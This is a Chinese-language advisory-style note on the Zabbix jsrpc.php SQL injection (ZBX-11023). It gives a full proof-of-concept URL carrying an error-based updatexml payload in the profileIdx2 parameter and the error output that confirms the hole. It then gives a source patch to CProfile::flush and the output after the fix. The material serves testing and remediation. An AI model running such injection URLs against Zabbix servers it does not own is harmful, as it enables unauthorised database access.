1.漏洞测试
在您的zabbix的地址后面加上如下url:
jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
我的地址如下:
http://10.192.1168.153/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
输出结果,如下表示漏洞存在:
<div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style=" 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">reset() expects parameter 1 to be array, null given [jsrpc.php:208 → CScreenHistory->get() → reset() in /var/www/html/zabbix/include/classes/screens/CScreenHistory.php:106]</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (1294, 1, 'web.item.graph.period', '3600', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (1295, 1, 'web.item.graph.stime', '20160817050632', 3, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li><li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (1296, 1, 'web.item.graph.isnow', '0', 2, 1 or updatexml(1,md5(0x11),1) or 1=1)#)] [XPATH syntax error: 'ed733b8d10be225eceba344d533586']</li></ul></td></tr></table>
2.修复方案
1).升级包链接地址[https://support.zabbix.com/browse/ZBX-11023](https://support.zabbix.com/browse/ZBX-11023)
2).暴力的修补方法是对CProfile类的flush方法中注入参数做强制整形转换即可 /var/www/html/zabbix/include/classes/user/CProfile.php:
public static function flush() { $result = false; if (self::$profiles !== null && self::$userDetails['userid'] > 0 && self::isModified()) { $result = true; foreach (self::$insert as $idx => $profile) { foreach ($profile as $idx2 => $data) { $result &= self::insertDB($idx, $data['value'], $data['type'],zbx_dbstr($idx2)); } } ksort(self::$update); foreach (self::$update as $idx => $profile) { ksort($profile); foreach ($profile as $idx2 => $data) { //这里用intval($idx2)或者zbx_dbstr($idx2)替换原来的$idx2 $result &= self::updateDB($idx, $data['value'], $data['type'], zbx_dbstr($idx2)); } } } return $result; }
修改后再用原漏洞测试Url,结果如下:
<div class="flickerfreescreen" id="flickerfreescreen_1" data-timestamp="1471403798083" style="position: relative;"></div><table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style=" 100%;"><tr><td class="msg" colspan="1"><ul class="messages"><li class="error">reset() expects parameter 1 to be array, null given [jsrpc.php:208 → CScreenHistory->get() → reset() in /var/www/html/zabbix/include/classes/screens/CScreenHistory.php:106]</li></ul></td></tr></table>
参考文档:
http://www.cnbraid.com/2016/08/18/zabbix303/
http://www.oschina.net/news/76236/zabbix-sql
http://seclists.org/fulldisclosure/2016/Aug/60
http://seclists.org/fulldisclosure/2016/Aug/79